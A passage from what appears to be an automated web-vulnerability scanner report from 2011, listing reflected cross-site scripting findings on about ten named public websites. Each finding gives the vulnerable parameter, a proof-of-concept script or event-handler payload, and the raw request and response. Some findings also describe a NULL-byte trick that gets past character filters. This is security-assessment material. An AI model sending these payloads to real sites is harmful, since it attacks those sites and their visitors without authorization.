HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56534 if(!window.WIDGETBOX){ ...[SNIP]... true); } }; WIDGETBOX.platform })(); WIDGETBOX.platform initializationParams : {"id":"8f8e2793-e99e-41bf configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.31. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 8] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 33b85<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:16 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... "8f8e2793-e99e-41bf-8b75 configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.32. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 9] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 37922<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:20 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... 41bf-8b75-95ef3e434575", configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.33. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://cds.sun.com |
Path: | /is-bin/INTERSHOP |
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6855a--><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /is-bin/INTERSHOP Host: cds.sun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:28:33 GMT Server: Apache/2.0.59 (Unix) Content-Length: 20208 Set-Cookie: sid=prDf2DxIwjnf2nEh Set-Cookie: pgid=yYdgaHqkkjVSR0E Cache-Control: no-cache,no-store,must Pragma: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: CDS_DETECT=detect; Domain=.sun.com; Path=/ Accept-Ranges: bytes Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... elimiter="&" parametername="goto" currenturl="https://cds ...[SNIP]... |
3.34. https://client.trafficshaping.com/signin [email parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://client.traff |
Path: | /signin |
Issue detail
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b192"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /signin?email=1b192"><script>alert(1)< Host: client.trafficshaping.com Connection: keep-alive Referer: http://trafficshaping.com Cache-Control: max-age=0 Origin: http://trafficshaping.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: csId=3922e3f116c2b71 |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:44:48 GMT Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.3.3-0.dotdeb.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:44:47 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 4659 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>TrafficShaping - Sign into Your Account</title> <meta name="description" conten ...[SNIP]... <input type="text" size="30" name="email" value="1b192"><script>alert(1)< ...[SNIP]... |
3.35. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://dean.edwards.name |
Path: | /weblog/2006/03/faster |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0070e78<a>271d7883f11 was submitted in the REST URL parameter 1. This input was echoed as 70e78<a>271d7883f11 in the application's response.This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /weblog%0070e78<a>271d7883f11/2006/03/faster HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:07 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html> <head> <title>/404</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedw ...[SNIP]... <a>271d7883f11/">weblog ...[SNIP]... |
3.36. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://dean.edwards.name |
Path: | /weblog/2006/03/faster |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dcea7"><script>alert(1This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /weblog%00dcea7"><script>alert(1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:06 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html> <head> <title>/404</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedw ...[SNIP]... <a href="/weblog%00dcea7"><script>alert(1)< ...[SNIP]... |
3.37. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://dean.edwards.name |
Path: | /weblog/2006/03/faster |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c01ec<a>2a3ca83c34f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/03/fasterc01ec<a>2a3ca83c34f HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:17 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name Expires: Sat, 26 Feb 2011 23:20:17 GMT Last-Modified: Sat, 26 Feb 2011 23:20:17 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8 <!doctype html> <html> <head> <title>dean.edwards.name <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedwards ...[SNIP]... </a>/fasterc01ec<a>2a3ca83c34f</h1> ...[SNIP]... |
3.38. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://dean.edwards.name |
Path: | /weblog/2006/06/again/ |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00fa627<a>784e947c10e was submitted in the REST URL parameter 1. This input was echoed as fa627<a>784e947c10e in the application's response.This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /weblog%00fa627<a>784e947c10e/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:50 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html> <head> <title>/404</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedw ...[SNIP]... <a>784e947c10e/">weblog ...[SNIP]... |
3.39. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://dean.edwards.name |
Path: | /weblog/2006/06/again/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0078f44"><script>alert(1This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /weblog%0078f44"><script>alert(1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:49 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html> <head> <title>/404</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedw ...[SNIP]... <a href="/weblog%0078f44"><script>alert(1)< ...[SNIP]... |
3.40. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://dean.edwards.name |
Path: | /weblog/2006/06/again/ |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f526a<a>bc4d18aee79 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/06/againf526a<a>bc4d18aee79/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:21:27 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name Expires: Sat, 26 Feb 2011 23:21:28 GMT Last-Modified: Sat, 26 Feb 2011 23:21:28 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8 <!doctype html> <html> <head> <title>dean.edwards.name <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedwards ...[SNIP]... </a>/againf526a<a>bc4d18aee79/</h1> ...[SNIP]... |
3.41. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://dean.edwards.name |
Path: | /weblog/2006/06/again/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8539"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/06/again/?d8539"><script>alert(1)< Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:20:07 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name Link: <http://dean.edwards.name Expires: Sat, 26 Feb 2011 23:20:07 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 214711 <!doctype html> <html> <head> <title>Dean Edwards: window.onload (again)</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://d ...[SNIP]... <form class="contact" action="/weblog/2006/06 ...[SNIP]... |
3.42. https://event.on24.com/eventRegistration/EventLobbyServlet [key parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://event.on24.com |
Path: | /eventRegistration |
Issue detail
The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 954f9"><x%20style%3dxThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /eventRegistration Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:29:57 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=rTgXMMJ19 X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close <!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="key" value="453849B62CAB5 ...[SNIP]... |
3.43. https://event.on24.com/eventRegistration/EventLobbyServlet [partnerref parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://event.on24.com |
Path: | /eventRegistration |
Issue detail
The value of the partnerref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c8f"><x%20style%3dxThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /eventRegistration Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:08 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=7cDI022cg X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close <!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="partnerref" value="ocom99c8f"><x style=x:expression(alert ...[SNIP]... |
3.44. https://event.on24.com/eventRegistration/EventLobbyServlet [sourcepage parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://event.on24.com |
Path: | /eventRegistration |
Issue detail
The value of the sourcepage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab0db"><x%20style%3dxThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /eventRegistration Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:17 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=62BqOkDMb X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close <!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="sourcepage" value="registerab0db"><x style=x:expression(alert ...[SNIP]... |
3.45. http://init.zopim.com/register [mID parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://init.zopim.com |
Path: | /register |
Issue detail
The value of the mID request parameter is copied into the HTML document as plain text between tags. The payload eb22e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /register?swfVer=2371&sk Host: init.zopim.com Proxy-Connection: keep-alive Referer: http://zopim.com/swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 26 Feb 2011 20:42:18 GMT Connection: keep-alive Content-Length: 856 {"status": "offline", "__status": "ok", "name": "Visitor 210780399", "settings": {"chatbutton": {"position": "br", "theme": "bar"}, "greetings": {"away": {"window": "If you leave a question or comment ...[SNIP]... Leave a message"}, "online": {"window": "Leave a question or comment and our agents will try to attend to you shortly =)", "bar": "Click here to chat"}}}, "machineID": "gLAMf6t1oQdRZ9pJbWZ |
3.46. http://lfov.net/webrecorder/g/chimera.js [vid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://lfov.net |
Path: | /webrecorder/g/chimera.js |
Issue detail
The value of the vid request parameter is copied into the HTML document as plain text between tags. The payload a35d3<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /webrecorder/g/chimera.js Host: lfov.net Proxy-Connection: keep-alive Referer: http://webcontent Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Coyote-2-405e0b67 |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat Set-Cookie: LOOPFUSE="nulla35d3<img src=a onerror=alert(1) Content-Length: 62 Date: Sat, 26 Feb 2011 23:20:13 GMT Set-Cookie: Coyote-2-405e0b67 _lf_vid='nulla35d3<img src=a onerror=alert(1) |
3.47. http://odb.outbrain.com/utils/get [callback parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://odb.outbrain.com |
Path: | /utils/get |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c68ad<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /utils/get?url=http%3A%2F Host: odb.outbrain.com Proxy-Connection: keep-alive Referer: http://ioerror.us/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: obuid=0e0ed3f9-f76f-4651 |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-cache Pragma: no-cache Set-Cookie: tick=1298762384782; Domain=.outbrain.com; Path=/ P3P: policyref="http://www Set-Cookie: _lvs2="7/zvT3TaXCJmX Set-Cookie: _lvd2=p47tkLgO+tfGFc Set-Cookie: _rcc2="c5YqA63GvjSl Set-Cookie: recs-74e9af2a662553e Content-Type: text/x-json;charset=UTF-8 Vary: Accept-Encoding Date: Sat, 26 Feb 2011 23:19:44 GMT Content-Length: 2920 outbrain_rater.retur ...[SNIP]... <\/span>','raterMode': |
3.48. https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | https://shop.winamp.com |
Path: | /DRHM/store |
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 94384-->4321560c01e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /DRHM/store?Action Host: shop.winamp.com Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:17 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 14076 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?94384-->4321560c01e=1&Action=DisplayESIPage ...[SNIP]... |
3.49. https://shop.winamp.com/store [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | https://shop.winamp.com |
Path: | /store |
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 741fc-->4ffb80c87d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /store?Action=DisplayPage Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:47 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 101351 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?741fc-->4ffb80c87d5=1&Action=DisplayESIPage ...[SNIP]... |
3.50. http://widgets.digg.com/buttons/count [url parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://widgets.digg.com |
Path: | /buttons/count |
Issue detail
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 12603<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=http Host: widgets.digg.com Proxy-Connection: keep-alive Referer: http://techcrunch.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Age: 0 Date: Sun, 27 Feb 2011 02:33:09 GMT Via: NS-CACHE: 100 Etag: "d22d498f927e3a9e446 Content-Length: 116 Server: TornadoServer/0.1 Content-Type: application/json Accept-Ranges: bytes Cache-Control: private, max-age=599 Expires: Sun, 27 Feb 2011 02:43:08 GMT X-CDN: Cotendo Connection: Keep-Alive __DBW.collectDiggs({"url" |
3.51. http://www.business-software.com/top-10-web-content-management-vendors.php [gclid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.business |
Path: | /top-10-web-content |
Issue detail
The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887e2"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
